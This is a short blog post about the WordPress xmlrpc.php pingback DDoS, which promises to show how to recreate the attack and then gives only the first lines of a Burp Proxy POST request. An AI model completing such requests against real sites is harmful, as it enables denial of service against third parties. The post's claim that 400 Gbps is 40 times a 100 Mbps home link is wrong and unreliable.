WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress.  I am going to show how to create a request to recreate the attack.  The attack send upwards of 400 Gbps through the internet. By comparison you’re home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.


I created the request in BURP PROXY:

Capture (1)

POST /xmlrpc.php HTTP/1.0
Content-Type: text/xml
<?xml version=”1.0″?>

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.